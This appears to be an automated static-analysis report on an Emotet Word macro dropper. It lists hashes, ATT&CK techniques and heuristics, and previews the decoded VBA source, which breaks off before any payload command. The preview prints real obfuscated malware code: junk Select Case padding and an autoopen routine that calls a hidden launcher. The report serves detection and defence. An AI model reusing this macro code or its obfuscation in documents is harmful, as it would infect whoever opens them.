Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7b492a6aa0b683eb…

MALICIOUS

Office (OLE)

Size: 148.8 KB
Created: 2019-05-02 16:38:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 157535a2bffd27ed82eb4fac64bd8bdc
SHA-1: f90a46b60567a7bb0f64b86eec47a7ad7c65e391
SHA-256: 7b492a6aa0b683eb1c70b5363eb6649a63b0cf81cf23c8534546d71a762be37c
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1137.001 Office Application Startup: Office Application

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Emotet-6960272-0'. Heuristics indicate the presence of legacy WordBasic auto-exec macros and VBA macros, specifically an 'AutoOpen' macro. Critically, the VBA code utilizes WMI (Win32_Process) to launch a process, a common technique for downloading and executing further stages of malware. The presence of an 'autoopen' marker and the WMI process creation strongly suggest this document is designed to execute malicious code upon opening.

Heuristics (7)

  • ClamAV: Doc.Dropper.Emotet-6960272-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6960272-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31128 bytes
SHA-256: 9b6ef2b31a24f2c878c1e0a7e1d686e90dd81268dd00ad81c90de28a051389f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "P304821"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "B854667"
Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z03201"

Attribute VB_Name = "C37266_"

Attribute VB_Name = "c955609"
Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "l4722754"
Function F497_66(z64_72)
   Select Case n5554069
Case i465376 = b66820 = Sgn(471333696)
Case s7261945 = p89161
Case a504467_ = Log(n36069)
Case J239105 = CBool(451270235)
Case n6_881 = 957082140
Case i3801617 = CDate(v3_2193)
End Select
   Select Case Y3_0594
Case Y6613_ = E47130 = Sgn(182332894)
Case c71647 = R47376_
Case n46623 = Log(S7943494)
Case n472_7 = CBool(455423588)
Case O9698_32 = 838331306
Case X536__2 = CDate(w9_432)
End Select
   Select Case Q6495_83
Case U32_903 = z8674829 = Sgn(468039462)
Case i2662841 = p443443
Case s91043 = Log(w1433080)
Case j9172563 = CBool(377410670)
Case C5_836_ = 496974668
Case K495__ = CDate(X742764)
End Select
Set F497_66 = CVar(z64_72)
   Select Case b52_114
Case d62_87 = k___192 = Sgn(709969944)
Case D_9917 = m52179
Case k0302_1 = Log(s5867_3)
Case P95956 = CBool(855892121)
Case C5742481 = 236360998
Case z2_23326 = CDate(V07769)
End Select
   Select Case V216_3
Case p1113571 = z_8__7 = Sgn(122239280)
Case C9947_1 = q754866
Case Z965280 = Log(W63641)
Case J185126 = CBool(897905841)
Case n74256_7 = 117942140
Case f159_85 = CDate(M48245)
End Select
   Select Case U7_449
Case b925_199 = a575393_ = Sgn(483630630)
Case U72964 = o71205
Case H8129321 = Log(z43254_7)
Case w86876 = CBool(291986409)
Case L810_13 = 458547345
Case G61904_ = CDate(L933330)
End Select
End Function
Sub autoopen()
   Select Case h_09641
Case p7_418 = R5123_ = Sgn(377277628)
Case s46998 = K92527
Case S766_3 = Log(R42056_6)
Case Z8251__ = CBool(30290621)
Case S8395005 = 889515263
Case f29566 = CDate(l0719212)
End Select
   Select Case C1040_9
Case s26389 = A6_9_271 = Sgn(964608343)
Case S6_21414 = m6352781
Case P25767 = Log(u43_39)
Case t_508681 = CBool(267674597)
Case T9601268 = 242473150
Case j66_5_7 = CDate(V36987)
End Select
   Select Case u_368338
Case h298942 = o133250 = Sgn(56115851)
Case I_501102 = A688875
Case Y846787 = Log(D2925008)
Case j8_345 = CBool(626239198)
Case b661584 = 108196528
Case n355119 = CDate(D90_4208)
End Select
Call X01_884
   Select Case i747408_
Case O4470_71 = z36309_ = Sgn(778089229)
Case z_142047 = q00083_
Case o05739 = Log(F97___)
Case S3_517_9 = CBool(596131204)
Case R77705 = 712650870
Case d4078830 = CDate(s0424__)
End Select
   Select Case L385843
Case P231831 = i05537 = Sgn(839811757)
Case n_62440 = b023649
Case j8206679 = Log(p_179_)
Case B3002277 = CBool(49099996)
Case W177933 = 187188136
Case z669098 = CDate(O31496)
End Select
End Sub

Attribute VB_Name = "r71782"
Function X01_884()
On Error Resume Next
   Select Case C36046
Case L925428 = r32461 = Sgn(73907688)
Case z3453775 = I_01619
Case K171433 = Log(p73684)
Case N97700_ = CBool(264746464)
Case z28386 = 653461758
Case V312_147 = CDate(j46619)
End Select
   Select Case R9529912
Case B_8503 = q9378825 = Sgn(210491738)
Case Q359_577 = u8_73094
Case T_6727 = Log(l_4753)
Case f29_3760 = CBool(911317383)
Case w50413 = 639562234
Case k084860 = CDate(Q480438)

... (truncated)